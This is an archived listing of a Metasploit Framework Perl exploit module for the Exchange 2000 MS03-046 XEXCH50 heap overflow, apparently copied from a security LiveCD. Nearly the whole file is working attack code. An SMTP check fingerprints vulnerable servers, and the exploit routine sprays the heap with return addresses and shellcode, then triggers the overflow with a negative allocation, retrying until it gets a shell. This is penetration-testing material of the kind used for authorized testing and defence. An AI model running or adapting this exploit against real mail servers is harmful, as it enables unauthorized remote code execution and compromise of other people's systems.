home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / exchange2000_xexch50.pm < prev    next >
Encoding:
Perl POD Document  |  2006-06-30  |  7.5 KB  |  314 lines
  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Exploit::exchange2000_xexch50;
  11. use base "Msf::Exploit";
  12. use strict;
  13. use Pex::Text;
  14.  
  15. my $advanced = { };
  16.  
  17. my $info =
  18.   {
  19.     'Name'  => 'Exchange 2000 MS03-46 Heap Overflow',
  20.     'Version'  => '$Revision: 1.35 $',
  21.     'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ],
  22.  
  23.     'Arch'  => [ 'x86' ],
  24.     'OS'    => [ 'win32', 'win2000' ],
  25.     'Priv'  => 1,
  26.  
  27.     'UserOpts'  =>
  28.       {
  29.         'RHOST' => [1, 'ADDR', 'The target address'],
  30.         'RPORT' => [1, 'PORT', 'The target port', 25],
  31.         'SSL'   => [0, 'BOOL', 'Use SSL'],
  32.       },
  33.  
  34.     'Payload' => {
  35.         'Space'  => 1024,
  36.         'BadChars'  => "\x00\x0a\x0d\x20:=+\x22",
  37.       },
  38.  
  39.     'Description'  => Pex::Text::Freeform(qq{
  40.         This is an exploit for the Exchange 2000 heap overflow. Due
  41.         to the nature of the vulnerability, this exploit is not very
  42.         reliable. This module has been tested against Exchange 2000
  43.         SP0 and SP3 running a Windows 2000 system patched to SP4. It
  44.         normally takes between one and ten tries to successfully
  45.         obtain a shell. This exploit is *very* unreliable, we hope
  46.         to provide a much more solid one in the near future.
  47. }),
  48.     'Refs'  =>
  49.       [
  50.         ['OSVDB', '2674'],
  51.         ['MSB',   'MS03-046'],
  52.         ['MIL',   '20'],
  53.       ],
  54.  
  55.     'DefaultTarget' => 0,
  56.     'Targets' => [['Exchange 2000', 0x0c900c90, 3000, 11000, 512]],
  57.  
  58.     'Keys' => ['exchange2000'],
  59.  
  60.     'DisclosureDate' => 'Oct 15 2003',
  61.   };
  62.  
  63. sub new {
  64.     my $class = shift;
  65.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  66.     return($self);
  67. }
  68.  
  69. sub Check {
  70.     my $self = shift;
  71.     my $target_host = $self->GetVar('RHOST');
  72.     my $target_port = $self->GetVar('RPORT');
  73.  
  74.     my $s = Msf::Socket::Tcp->new
  75.       (
  76.         'PeerAddr'  => $target_host,
  77.         'PeerPort'  => $target_port,
  78.         'LocalPort' => $self->GetVar('CPORT'),
  79.         'SSL'       => $self->GetVar('SSL'),
  80.       );
  81.     if ($s->IsError) {
  82.         $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
  83.         return $self->CheckCode('Connect');
  84.     }
  85.  
  86.     my $res = $s->Recv(-1, 20);
  87.     if ($res !~ /Microsoft/) {
  88.         $s->Close();
  89.         $self->PrintLine("[*] Target does not appear to be an exchange server");
  90.         return $self->CheckCode('Safe');
  91.     }
  92.  
  93.     $s->Send("EHLO X\r\n");
  94.     $res = $s->Recv(-1, 3);
  95.     if ($res !~ /XEXCH50/) {
  96.         $s->Close();
  97.         $self->PrintLine("[*] Target does not appear to be an exchange server");
  98.         return $self->CheckCode('Safe');
  99.     }
  100.  
  101.     $s->Send("MAIL FROM: metasploit\r\n");
  102.     $res = $s->Recv(-1, 3);
  103.  
  104.     $s->Send("RCPT TO: administrator\r\n");
  105.     $res = $s->Recv(-1, 3);
  106.  
  107.     $s->Send("XEXCH50 2 2\r\n");
  108.     $res = $s->Recv(-1, 3);
  109.     $s->Close();
  110.  
  111.     if ($res !~ /Send binary/) {
  112.         $self->PrintLine("[*] Target has been patched");
  113.         return $self->CheckCode('Safe');
  114.     }
  115.  
  116.     $self->PrintLine("[*] Target appears to be vulnerable");
  117.     return $self->CheckCode('Appears');
  118. }
  119.  
  120. sub Exploit {
  121.     my $self = shift;
  122.     my $target_host = $self->GetVar('RHOST');
  123.     my $target_port = $self->GetVar('RPORT');
  124.     my $target_idx  = $self->GetVar('TARGET');
  125.     my $shellcode   =$self->GetVar('EncodedPayload')->Payload;
  126.  
  127.     my $target = $self->Targets->[$target_idx];
  128.     my ($tname, $retaddr) = @{$target};
  129.     my $buff_len = $target->[2];
  130.  
  131.     $self->PrintLine(sprintf("[*] Trying '$tname' using return address 0x%.8x [$buff_len]", $retaddr));
  132.  
  133.     my $counter = 1;
  134.     my @seencount = ();
  135.  
  136.     while (1) {
  137.         if(! $seencount[$counter]) {
  138.             $self->PrintLine("[*] Exploit attempt #$counter");
  139.             $seencount[$counter]++;
  140.         }
  141.  
  142.         $self->Print("[*] Connection 1: ");
  143.         my $s = Msf::Socket::Tcp->new
  144.           (
  145.             'PeerAddr'  => $target_host,
  146.             'PeerPort'  => $target_port,
  147.             'LocalPort' => $self->GetVar('CPORT'),
  148.             'SSL'       => $self->GetVar('SSL'),
  149.           );
  150.         if ($s->IsError) {
  151.             $self->PrintLine('Error');
  152.             sleep(5);
  153.             next;
  154.         }
  155.  
  156.         my $res = $s->Recv(-1, 3);
  157.         if (! $res) {
  158.             $self->PrintLine("Error");
  159.             next;
  160.         }
  161.  
  162.         if ($res !~ /Microsoft/) {
  163.             $s->Close();
  164.             $self->PrintLine("Error");
  165.             $self->PrintLine("[*] Target does not appear to be running Exchange: $res");
  166.             return;
  167.         }
  168.  
  169.         $self->Print("EHLO ");
  170.         $s->Send("EHLO X\r\n");
  171.         $res = $s->Recv(-1, 3);
  172.         if (! $res) { $self->PrintLine("Error"); next; }
  173.  
  174.         if ($res !~ /XEXCH50/) {
  175.             $self->PrintLine("Error");
  176.             $self->PrintLine("[*] Target is not running Exchange: $res");
  177.             return;
  178.         }
  179.  
  180.         $self->Print("MAIL ");
  181.         $s->Send("MAIL FROM: metasploit\r\n");
  182.         $res = $s->Recv(-1, 3);
  183.         if (! $res) { $self->PrintLine("Error"); next; }
  184.  
  185.         $self->Print("RCPT ");
  186.         $s->Send("RCPT TO: administrator\r\n");
  187.         $res = $s->Recv(-1, 3);
  188.         if (! $res) { $self->PrintLine("Error"); next; }
  189.  
  190.         # verify that the server is not patched
  191.         $s->Send("XEXCH50 2 2\r\n");
  192.         $res = $s->Recv(-1, 3);
  193.         if (! $res) { $self->PrintLine("Error"); next; }
  194.  
  195.         $self->Print("XEXCH50 ");
  196.         if ($res !~ /Send binary/) {
  197.             $s->Close();
  198.             $self->PrintLine("Error");
  199.             $self->PrintLine("[*] Target is not vulnerable");
  200.             return;
  201.         }
  202.  
  203.         $s->Send("XX");
  204.         $res = $s->Recv(-1, 3);
  205.         if (! $res) { $self->PrintLine("Error"); next; }
  206.  
  207.         $self->Print("ALLOC ");
  208.  
  209.         # allocate heap memory
  210.         my $dsize = (1024 * 1024 * 32);
  211.         $s->Send("XEXCH50 $dsize 2\r\n");
  212.         $res = $s->Recv(-1, 3);
  213.         $self->PrintLine("OK");
  214.  
  215.         my $payload =  ((
  216.                 (pack("V", $retaddr) x (256 * 1024)).
  217.                   $shellcode .  ("X" x 1024)
  218.             ) x 4
  219.           ). ("BEEF");
  220.  
  221.         $self->Print("[*] Uploading shellcode to remote heap: ");
  222.         $s->Send($payload);
  223.         $self->PrintLine("OK");
  224.  
  225.         $self->Print("[*] Connection 2: ");
  226.         my $x = Msf::Socket::Tcp->new
  227.           (
  228.             'PeerAddr'  => $target_host,
  229.             'PeerPort'  => $target_port,
  230.             'SSL'       => $self->GetVar('SSL'),
  231.           );
  232.         if ($x->IsError) {
  233.             $self->PrintLine('Error');
  234.             next;
  235.         }
  236.  
  237.         $res = $x->Recv(-1, 3);
  238.         if (! $res) {
  239.             $self->PrintLine("Error");
  240.             $self->PrintLine("[*] No response");
  241.             next;
  242.         }
  243.  
  244.         $self->Print("EHLO ");
  245.         $x->Send("EHLO X\r\n");
  246.         $res = $x->Recv(-1, 3);
  247.         if (! $res) { $self->PrintLine("Error"); next; }
  248.  
  249.         if ($res !~ /XEXCH50/) {
  250.             $self->PrintLine("Error");
  251.             $self->PrintLine("[*] Target is not running Exchange: $res");
  252.             return;
  253.         }
  254.  
  255.         $self->Print("MAIL ");
  256.         $x->Send("MAIL FROM: metasploit\r\n");
  257.         $res = $x->Recv(-1, 3);
  258.         if (! $res) { $self->PrintLine("Error"); next; }
  259.  
  260.         $self->Print("RCPT ");
  261.         $x->Send("RCPT TO: administrator\r\n");
  262.         $res = $x->Recv(-1, 3);
  263.         if (! $res) { $self->PrintLine("Error"); next; }
  264.  
  265.         $self->Print("XEXCH50 ");
  266.  
  267.         # allocate a negative value
  268.         $x->Send("XEXCH50 -1 2\r\n");
  269.         $res = $x->Recv(-1, 3);
  270.         if (! $res) {
  271.             $self->PrintLine("Error");
  272.             $self->PrintLine("[*] No response");
  273.             next;
  274.         }
  275.         $self->PrintLine("OK");
  276.  
  277.         $buff_len += $target->[4];
  278.         if ($buff_len > $target->[3]) { $buff_len = $target->[2] }
  279.  
  280.         # send the massive buffer of our return address
  281.         my $heapover = pack("V", $retaddr) x ($buff_len);
  282.  
  283.         $self->PrintLine("[*] Overwriting heap with payload jump ($buff_len)...");
  284.         $x->Send($heapover);
  285.  
  286.         # reconnect until the service stops responding
  287.         my $count = 0;
  288.         $self->Print("[*] Starting reconnect sequences: ");
  289.  
  290.         while ($count < 10) {
  291.             my $tmp = Msf::Socket::Tcp->new
  292.               (
  293.                 'PeerAddr'  => $target_host,
  294.                 'PeerPort'  => $target_port,
  295.                 'LocalPort' => $self->GetVar('CPORT'),
  296.                 'SSL'       => $self->GetVar('SSL'),
  297.               );
  298.  
  299.             if ($tmp->IsError) {
  300.                 last;
  301.             }
  302.  
  303.             $tmp->Send("HELO X\r\n");
  304.             $tmp->Close();
  305.             $count++;
  306.         }
  307.         $self->PrintLine(" OK");
  308.         $self->PrintLine("");
  309.         $counter++;
  310.     }
  311.     return;
  312. }
  313.  
  314.